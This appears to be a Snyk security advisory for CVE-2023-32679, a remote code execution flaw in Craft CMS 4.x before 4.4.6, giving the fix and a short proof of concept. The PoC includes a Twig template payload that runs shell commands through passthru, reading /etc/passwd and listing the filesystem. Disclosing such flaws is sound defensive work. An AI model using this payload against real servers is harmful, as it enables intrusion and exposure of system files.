Remote Code Execution (RCE) Affecting craftcms/cms package, versions >=4.0.0, <4.4.6
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-CRAFTCMSCMS-5595548
- published 23 May 2023
- disclosed 22 May 2023
- credit awakerrday
Introduced: 22 May 2023
CVE-2023-32679 Open this link in a new tabHow to fix?
Upgrade craftcms/cms to version 4.4.6 or higher.
Overview
craftcms/cms is a content management system.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to not restricting file extensions for templates to only the expected defaultTemplateExtensions = ['html', 'twig']. This allows privileged users with ALLOW_ADMIN_CHANGES=true set to upload and execute arbitrary code. If the name parameter value is not an empty string in the _resolveTemplate() function it returns directly without extension verification.
PoC
Create a new filesystem with Base Path
/var/www/html/templatesCreate a new asset volume with Asset Filesystem
templateUpload payload in a twig template
{{'<pre>'}}
{{['cat /etc/passwd']|map('passthru')|join}}
{{['id;pwd;ls -altr /']|map('passthru')|join}}
Create a new global set with template layout using the filename of the file just uploaded
Access the global menu or
/admin/global/test